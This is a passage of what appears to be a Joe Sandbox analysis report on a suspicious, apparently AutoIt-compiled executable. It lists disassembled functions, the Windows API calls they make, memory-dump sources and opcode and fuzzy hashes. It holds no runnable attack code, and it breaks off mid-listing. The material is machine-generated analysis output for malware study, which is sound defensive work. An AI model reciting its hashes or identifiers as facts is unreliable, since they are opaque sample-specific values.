                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: 1687730edba5539318438fdc2f405433cccc1d76fff94ef876e434aeed8d54a5
                                                          • Instruction ID: dc23480115f47c3cffb32d63c33ddb829709e92d91cb4f86cdd555623496cd6d
                                                          • Opcode Fuzzy Hash: 1687730edba5539318438fdc2f405433cccc1d76fff94ef876e434aeed8d54a5
                                                          • Instruction Fuzzy Hash: 7821A132600219ABDF268FA5DC42FEA3B79EF48724F110218FE54AB191D675AC51DBA0
                                                          Function 003C7BC5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003C7C7C
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003C7C8A
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003C7C91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: ef48488dbf191b4a676c54ef433ec209a178f4df52f96560d0362f7615a07ea6
                                                          • Instruction ID: 2b1fb583781cd99ef77b00cf17baad8520c177a1e666d641c5f5c52ffeca9357
                                                          • Opcode Fuzzy Hash: ef48488dbf191b4a676c54ef433ec209a178f4df52f96560d0362f7615a07ea6
                                                          • Instruction Fuzzy Hash: C1212CB5604209AFDB12DF24DC81EA737EDEF5A354B054459FA05DB2A1CB31EC518BA0
                                                          Function 003C6CE2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003C6D6D
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003C6D7D
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003C6DA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 3632250c3f4b2d5c6826d81f1221583c86e819ccc681af4ebd80be9d554b2a60
                                                          • Instruction ID: 9e2a457e20685c98949bdcdccaac0aa50fec635d7cad9da0416b7a282b6501c5
                                                          • Opcode Fuzzy Hash: 3632250c3f4b2d5c6826d81f1221583c86e819ccc681af4ebd80be9d554b2a60
                                                          • Instruction Fuzzy Hash: 7A216572610118BFDF128F54DC4AFBB37AEEF89754F118128F945DB190C671AC5197A0
                                                          Function 003B3AFF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 003B3B7C
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d$%=
                                                          • API String ID: 3506404897-2298458297
                                                          • Opcode ID: 5ee94be6ed250ba2ff352d3e1bcf6ce42525bf659d1bddd2a94b6c3e2b6af112
                                                          • Instruction ID: 3b816126cb154d145e7a548a6e2758857abde00219d9893d0bc80f1be0c39bed
                                                          • Opcode Fuzzy Hash: 5ee94be6ed250ba2ff352d3e1bcf6ce42525bf659d1bddd2a94b6c3e2b6af112
                                                          • Instruction Fuzzy Hash: 42211E35600229ABCF16EFA4CC82EEEB7A5FB44704F404499F605AF185DB34EA45CBA1
                                                          Function 003C7740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003C77A4
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003C77B9
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003C77C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: 8be0bb31a41b20442408354bb82c8877317603842b2875e63e07df6684743e9e
                                                          • Instruction ID: 3a81201a921e3c9fba457896fd90bf6cf5f46fcb0b1d69a2b0bffbbbf3b2c21c
                                                          • Opcode Fuzzy Hash: 8be0bb31a41b20442408354bb82c8877317603842b2875e63e07df6684743e9e
                                                          • Instruction Fuzzy Hash: 1A11C172244208BAEF155F60CC45FEB7BADEB89B54F02012CFA41A60A0D671A851DB20
                                                          Function 00366CEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: ?$@B@
                                                          • API String ID: 3494438863-2252957899
                                                          • Opcode ID: 32dcfc551e799f9ee017bd6a722f09935fd8b3af9be7db14f8e2a0cab58a5e58
                                                          • Instruction ID: 6dc42cad2f335b9d6f269955de615d69900434f7455ad01f60dc954193556581
                                                          • Opcode Fuzzy Hash: 32dcfc551e799f9ee017bd6a722f09935fd8b3af9be7db14f8e2a0cab58a5e58
                                                          • Instruction Fuzzy Hash: D9F0F671309B138BFB269F19BE1276227D5EF45760F10847FE204EE198EB308C804E99
                                                          Function 00344C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00344C2E), ref: 00344CA3
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00344CB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: 6dfdf27229594947d2f66b2f87cc7798faf2c81e2954a06524ef53cbbf3c3c61
                                                          • Instruction ID: f240aa6b011c2f0d598cf3caee1395b828c92b4c0f3f8c4ffff14efdf067895d
                                                          • Opcode Fuzzy Hash: 6dfdf27229594947d2f66b2f87cc7798faf2c81e2954a06524ef53cbbf3c3c61
                                                          • Instruction Fuzzy Hash: 53D01770550723DFE7229F31EA58B46B6EAAF05791F1AC83ED886DA150E770EC80CB50
                                                          Function 00344D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00344D2E,?,00344F4F,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344D6F
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00344D81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: 9202f615afad7dfb7f2c7c9f7dc95ae802f88eaf023d449b6d9ab43a951d72bd
                                                          • Instruction ID: d2ca56be4d56d1c6c1a51fb61022759be7bff45837c92c4ba78605a8af8552ce
                                                          • Opcode Fuzzy Hash: 9202f615afad7dfb7f2c7c9f7dc95ae802f88eaf023d449b6d9ab43a951d72bd
                                                          • Instruction Fuzzy Hash: 37D01730910713CFD7229F31D808B56B6EAAF16352F16C93ED497DA260E770E880CB50
                                                          Function 00344D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00344CE1,?), ref: 00344DA2
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00344DB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: d6e5a52a7c2b38feba3214bacc8c4f9021145bc916e71412323b31a6471ac360
                                                          • Instruction ID: c596ab65280abf8b92a51776a4ccc7e01541c69782c3fe0dff4f0ea4198ea816
                                                          • Opcode Fuzzy Hash: d6e5a52a7c2b38feba3214bacc8c4f9021145bc916e71412323b31a6471ac360
                                                          • Instruction Fuzzy Hash: E7D0E230950712CFD7229B32D808A96B6EAAF06355B16883AD887DA160E770E8808B50
                                                          Function 003C0E72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,003C10C1), ref: 003C0E80
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003C0E92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: 17c35c8ba652bbb0af646e260ad60b891578c352411e5e835e7f01e78ed131a9
                                                          • Instruction ID: b3082027304c6f37e8c80193db0e02d162b64796e1a2d83d7ecfd1cb657121e1
                                                          • Opcode Fuzzy Hash: 17c35c8ba652bbb0af646e260ad60b891578c352411e5e835e7f01e78ed131a9
                                                          • Instruction Fuzzy Hash: 77D01770560B23CFD726AF35C908BD676E9AF05352F168C3EE5CAD6250E670D880CB50
                                                          Function 003B91F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003B8E09,?,003CF910), ref: 003B9203
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003B9215
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 6799de1106aea00e9e19fe94fa8b16739dd3075cdf548d551b767e7e5d310747
                                                          • Instruction ID: 1fc7eff94a184e2598952cfd79e2045ad93dc76c86094be126a0fa6e36484f92
                                                          • Opcode Fuzzy Hash: 6799de1106aea00e9e19fe94fa8b16739dd3075cdf548d551b767e7e5d310747
                                                          • Instruction Fuzzy Hash: 50D0C230A50327DFC7225F30DC08A8276DAAF00345F05CC3EDA82C6550D770D880C710
                                                          Function 00381A6D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 439e1a88b7db9284b3cc412d124f38a6feb85ca8b20f0a565a20528315a1c034
                                                          • Instruction ID: 65a42744219e49c2e09c5fb0cdc22d52e764a3c69eff3dfacaa1927116e87e26
                                                          • Opcode Fuzzy Hash: 439e1a88b7db9284b3cc412d124f38a6feb85ca8b20f0a565a20528315a1c034
                                                          • Instruction Fuzzy Hash: AAD01271C05219EBCB5BA691C885DF9777CE708300F145492F502E2450E229DB959B21
                                                          Function 003974A5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79dcbc3c6dd72c7ab63ad74daa02b6b7cc95124651c2466eaf38570a327cf966
                                                          • Instruction ID: e858388a5a05b8a6da7f440d142b82a47fa6b348b0b7d7489623d485d6346afd
                                                          • Opcode Fuzzy Hash: 79dcbc3c6dd72c7ab63ad74daa02b6b7cc95124651c2466eaf38570a327cf966
                                                          • Instruction Fuzzy Hash: DAC17F74A14216EFCF15CF98C884EAEB7B9FF49714B158598E805EB291D730ED81CB90
                                                          Function 003BE13E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 003BE1D2
                                                          • CharLowerBuffW.USER32(?,?), ref: 003BE215
                                                            • Part of subcall function 003BD8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003BD8D9
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003BE415
                                                          • _memmove.LIBCMT ref: 003BE428
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: 26778a0d39845d4bd1acae9530f7afd6e55516fb5423413d3f5d6b89a32e1261
                                                          • Instruction ID: 73ead80d5ac58fe44ee06f20c979c109e8b317627af529878557d8851334c002
                                                          • Opcode Fuzzy Hash: 26778a0d39845d4bd1acae9530f7afd6e55516fb5423413d3f5d6b89a32e1261
                                                          • Instruction Fuzzy Hash: DAC17A756083119FC706DF28C481AAABBE4FF88318F14896EF9999B751D731E905CF82
                                                          Function 003B81A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 003B81D8
                                                          • CoUninitialize.OLE32 ref: 003B81E3
                                                            • Part of subcall function 0039D87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039D8E3
                                                          • VariantInit.OLEAUT32(?), ref: 003B81EE
                                                          • VariantClear.OLEAUT32(?), ref: 003B84BF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: a8eca228c21e66363faecc8047cedc5ddb3874c4f837258e03819c6096ee31ea
                                                          • Instruction ID: 4b3d994d7d457558481509a5097fd4836345e15e37106028630e5278bc246152
                                                          • Opcode Fuzzy Hash: a8eca228c21e66363faecc8047cedc5ddb3874c4f837258e03819c6096ee31ea
                                                          • Instruction Fuzzy Hash: DDA1F3792047019FCB12DF15C881B5AB7E9BF88714F058859FA9A9F7A1CB30ED05CB41
                                                          Function 00396BD3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: 8f282759c47374644cb2aed3f06349cef43aaec3c896de1f79f96cdd9ee8685b
                                                          • Instruction ID: 6d7be375aa1bf48ccc0daaf1de66fa00272feb4a6fba2554136ee99b58fab269
                                                          • Opcode Fuzzy Hash: 8f282759c47374644cb2aed3f06349cef43aaec3c896de1f79f96cdd9ee8685b
                                                          • Instruction Fuzzy Hash: 6751B2307153029BDF26AF75D896A6AB3EDEF45310F20882FE5A6CF691DB709840CB51
                                                          Function 003C9826 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowRect.USER32(0174CE10,?), ref: 003C9895
                                                          • ScreenToClient.USER32(00000002,00000002), ref: 003C98C8
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003C9935
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: aaedff991679e8a20b03329ccd5ddec08437ead5ab5721c73acbca254ba3f1b6
                                                          • Instruction ID: 09fa863cb75830007b8063becffcfa1195c6ff9100f3e244d2518b93a6bc1975
                                                          • Opcode Fuzzy Hash: aaedff991679e8a20b03329ccd5ddec08437ead5ab5721c73acbca254ba3f1b6
                                                          • Instruction Fuzzy Hash: F0512B35A00609AFCF15DF54D984FAE7BB6EB85320F12816EF855DB2A0D730AD51CB90
                                                          Function 003B6AC0 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                          Download Yara Rule
                                                          APIs
